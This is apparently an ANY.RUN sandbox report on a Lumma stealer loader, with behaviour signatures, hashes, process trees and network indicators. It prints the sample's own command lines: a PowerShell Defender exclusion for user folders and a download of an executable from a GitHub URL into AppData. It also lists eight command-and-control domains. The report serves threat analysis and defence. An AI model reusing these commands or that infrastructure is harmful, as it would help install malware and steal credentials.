File name:

2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom

Full analysis: https://app.any.run/tasks/f8801d74-a1f6-4178-8142-08164302ba7a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 29, 2025, 18:43:54
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
github
loader
lumma
stealer
enigma
delphi
antivm
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 6 sections
MD5:

C3669B4823E2F0F554499C5E929AAA97

SHA1:

5A4B8C2964253863227122D1738BC2F196559CF9

SHA256:

B7FAB345E82A4AEED46F00D68A0CA5358F1B2A28956CD0A63400E658C35F3FAC

SSDEEP:

12288:xgO8CkljMyEEjlxJqSH4QFboR7K/91NZ8Ws4w7dDbAVgp3S9Ay47b40sTT:sCkljMyEClxJqSZbJ9E4w7d9dSqR7b4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5280)
      • cmd.exe (PID: 1760)
    • Changes Windows Defender settings

      • cmd.exe (PID: 1760)
    • Actions looks like stealing of personal data

      • zegqzl.exe (PID: 1056)
    • Steals credentials from Web Browsers

      • zegqzl.exe (PID: 1056)
    • LUMMA has been detected (YARA)

      • zegqzl.exe (PID: 1056)
    • Connects to the CnC server

      • svchost.exe (PID: 2196)
    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2196)
    • LUMMA mutex has been found

      • zegqzl.exe (PID: 1056)
  • SUSPICIOUS

    • Reads the date of Windows installation

      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5556)
      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5280)
    • Reads security settings of Internet Explorer

      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5556)
      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5280)
    • Application launched itself

      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5556)
    • Starts CMD.EXE for commands execution

      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5280)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 1760)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1760)
      • cmd.exe (PID: 5332)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 5304)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 5304)
    • Searches for installed software

      • zegqzl.exe (PID: 1056)
    • There is functionality for VM detection VirtualBox (YARA)

      • zegqzl.exe (PID: 1056)
    • There is functionality for taking screenshot (YARA)

      • zegqzl.exe (PID: 1056)
    • Contacting a server suspected of hosting an CnC

      • svchost.exe (PID: 2196)
  • INFO

    • Checks supported languages

      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5556)
      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5280)
      • zegqzl.exe (PID: 1056)
    • Reads the computer name

      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5280)
      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5556)
      • zegqzl.exe (PID: 1056)
    • Process checks computer location settings

      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5556)
      • 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe (PID: 5280)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6148)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6148)
    • Checks proxy server information

      • powershell.exe (PID: 5304)
      • slui.exe (PID: 5176)
    • Disables trace logs

      • powershell.exe (PID: 5304)
    • Compiled with Borland Delphi (YARA)

      • zegqzl.exe (PID: 1056)
    • Enigma protector has been detected

      • zegqzl.exe (PID: 1056)
    • Reads the software policy settings

      • slui.exe (PID: 5176)
      • zegqzl.exe (PID: 1056)
    • Reads the machine GUID from the registry

      • zegqzl.exe (PID: 1056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Lumma

(PID) Process(1056) zegqzl.exe
C2 (8)parakehjet.run/kewk
buzzarddf.live/ktnt
zenithcorde.top/auid
bearjk.live/benj
techguidet.digital/apdo
techsyncq.run/riid
btcgeared.live/lbak
fishgh.digital/tequ
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:04:29 11:31:03+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.42
CodeSize: 265728
InitializedDataSize: 136192
UninitializedDataSize: -
EntryPoint: 0x15f3c
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
132
Monitored processes
11
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe no specs conhost.exe no specs 2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe #LUMMA zegqzl.exe #LUMMA svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1056"C:\Users\admin\AppData\Local\qobtqpftk\zegqzl.exe" C:\Users\admin\AppData\Local\qobtqpftk\zegqzl.exe
2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\qobtqpftk\zegqzl.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
Lumma
(PID) Process(1056) zegqzl.exe
C2 (8)parakehjet.run/kewk
buzzarddf.live/ktnt
zenithcorde.top/auid
bearjk.live/benj
techguidet.digital/apdo
techsyncq.run/riid
btcgeared.live/lbak
fishgh.digital/tequ
1760C:\WINDOWS\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Local\qobtqpftk', 'C:\Users', 'C:\ProgramData'"C:\Windows\System32\cmd.exe2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
5176C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5280"C:\Users\admin\Desktop\2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe" C:\Users\admin\Desktop\2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe
2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\desktop\2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
5304powershell -Command "Invoke-WebRequest -Uri 'https://github.com/grosesch/ibra/raw/refs/heads/main/chinainstal.exe' -OutFile 'C:\Users\admin\AppData\Local\qobtqpftk\zegqzl.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
5332C:\WINDOWS\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/grosesch/ibra/raw/refs/heads/main/chinainstal.exe' -OutFile 'C:\Users\admin\AppData\Local\qobtqpftk\zegqzl.exe'"C:\Windows\System32\cmd.exe2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
5556"C:\Users\admin\Desktop\2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe" C:\Users\admin\Desktop\2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
5864\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe2025-04-29_c3669b4823e2f0f554499c5e929aaa97_black-basta_cobalt-strike_satacom.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6148powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Local\qobtqpftk', 'C:\Users', 'C:\ProgramData'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
Total events
17 583
Read events
17 583
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
1
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
5304powershell.exeC:\Users\admin\AppData\Local\qobtqpftk\zegqzl.exeexecutable
MD5:3A64EE01E74E78217EC32474E93061BB
SHA256:E7FE47FC827AEB1F77CA5460EED7730E39D1068AF8891E2A94B7655989BD56A9
5304powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1tzgrowj.orw.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6148powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ufme445n.pzx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5304powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tv4j2z4j.zre.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6148powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3x0com22.35r.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6148powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:5D8F69AC8E0DFCE1D6DCE1AF6984B820
SHA256:F938D1910EE255EF1DB5418A335D59E73365209AD2BAB2904E50370BE6C0AF47
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
32
TCP/UDP connections
46
DNS requests
17
Threats
12

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
302
140.82.121.4:443
https://github.com/grosesch/ibra/raw/refs/heads/main/chinainstal.exe
unknown
GET
304
4.245.163.56:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
1012
SIHClient.exe
GET
200
23.216.77.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1012
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
GET
304
4.245.163.56:443
https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
1012
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
1012
SIHClient.exe
GET
200
23.216.77.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
1012
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
GET
200
4.245.163.56:443
https://slscr.update.microsoft.com/sls/ping
unknown
1012
SIHClient.exe
GET
200
23.216.77.9:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
5304
powershell.exe
140.82.121.4:443
github.com
GITHUB
US
whitelisted
5304
powershell.exe
185.199.111.133:443
raw.githubusercontent.com
FASTLY
US
whitelisted
1056
zegqzl.exe
104.21.51.232:443
zenithcorde.top
CLOUDFLARENET
malicious
1012
SIHClient.exe
172.202.163.200:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
1012
SIHClient.exe
23.216.77.9:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1012
SIHClient.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
google.com
  • 142.250.184.238
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
github.com
  • 140.82.121.4
whitelisted
raw.githubusercontent.com
  • 185.199.111.133
  • 185.199.110.133
  • 185.199.109.133
  • 185.199.108.133
whitelisted
bearjk.live
malicious
zenithcorde.top
  • 104.21.51.232
  • 172.67.190.162
malicious
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
crl.microsoft.com
  • 23.216.77.9
  • 23.216.77.10
  • 23.216.77.15
  • 23.216.77.7
  • 23.216.77.20
  • 23.216.77.19
  • 23.216.77.17
  • 23.216.77.12
  • 23.216.77.8
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET INFO Request for EXE via Powershell
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET INFO Request for EXE via Powershell
Misc activity
ET INFO Packed Executable Download
Misc activity
ET HUNTING EXE Downloaded from Github
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
2196
svchost.exe
A Network Trojan was detected
MALWARE [ANY.RUN] Suspected Domain Associated with Malware Distribution (zenithcorde .top)
2196
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
No debug info